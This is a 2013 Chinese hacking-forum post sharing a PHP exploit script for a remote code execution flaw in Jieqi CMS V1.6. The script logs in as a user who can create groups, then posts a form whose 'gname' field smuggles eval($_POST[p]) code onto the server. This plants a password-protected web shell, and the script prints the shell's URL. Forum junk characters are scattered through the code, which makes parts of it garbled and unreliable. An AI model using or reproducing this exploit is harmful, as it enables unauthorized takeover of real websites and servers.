找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2101|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。  M- n; G% Q; c2 d; t9 S7 Q

7 u  G* u/ `; v: ? 6 C' o/ b$ c7 j* I* i4 {' p
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
, h2 D: Y7 D7 b 需要有一个能创建圈子的用户。
' _2 o; L; ]0 P: U3 k
) t2 j% m. i2 k( ?2 o4 {% Z' b<?php, N* p. {- h) z/ v! B! w3 H
3 L, x. E- I2 M& P5 g2 K! I
print_r('
# v( W' v' q! q0 W4 j3 L- i+---------------------------------------------------------------------------+
! }1 A* D8 U! A, z8 MJieqi CMS V1.6 PHP Code Injection Exploit3 s' i' C; }# _+ A" r# C3 X2 o3 p
by flyh4t
; L& x+ Z9 g' M: v" \$ qmail: phpsec at hotmail dot com: q8 o( C* ^% ^9 v; n7 W
team: http://www.wolvez.org" t! O% o# E, z) E
+---------------------------------------------------------------------------+, M. _* e& r( E8 [
'); /**, ?2 y9 _& Y: Y7 {/ H# t6 f6 g- Z3 ]
* works regardless of php.ini settings& Z4 a( ~; R/ h4 n( E
*/ if ($argc < 5) { print_r('
; U4 W0 G8 B5 ^# H+ D$ L& f& O+---------------------------------------------------------------------------+& \: ~9 ?  `# [% ?5 b- }7 ]
Usage: php '.$argv[0].' host path username
: s9 f% c7 X0 U/ K0 Nhost:      target server (ip/hostname)5 A0 n. w$ e  P# A3 Y
path:      path to jieqicms 2 L* i' @1 X9 h% }5 `
uasename:  a username who can create group: z; Y; I3 ], b$ v
Example:4 S4 |# I; ~% }" V( y) ~
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
9 T, D- V5 d( f. ?$ c7 e% e7 K3 H+---------------------------------------------------------------------------+0 M7 F- m! a5 @9 M. l% F; |4 X
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799616 m' K/ Z2 [% J+ P/ T
Content-Disposition: form-data; name="gname"
" ^% A* L+ w# p2 c8 F
( Z  h; g* Z; E" Q8 j'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
* V8 d- r! T: n2 u1 N-----------------------------23281168279961) {/ v6 T. t7 x1 O4 g: b" H& C
Content-Disposition: form-data; name="gcatid"
2 J  F, G6 Y' L7 }" d5 o) @
. V" f' V; N) I- E1
; [' Z. s  H$ W: G7 P) A5 O-----------------------------232811682799610 X6 m: l! M7 D9 s/ ?5 z' c
Content-Disposition: form-data; name="gaudit"
0 e! i" t' ~8 l % L( Q  a; U# _! Q
11 O, I& F/ `; T
-----------------------------23281168279961
7 n. E- Y3 b- O/ S" EContent-Disposition: form-data; name="gbrief"
% |6 y& O+ ^) u ; q  T+ X' m) F" c% @/ P
1% @5 w- s8 g$ ^
-----------------------------23281168279961--
: {7 E+ I% d0 g0 w) o- f* k: Q7 |+ o5 T'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com8 M; w) T! @6 \& c% a0 h( |

+ U0 O5 N6 f" q# {7 `+ g8 H# Z3 Bpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表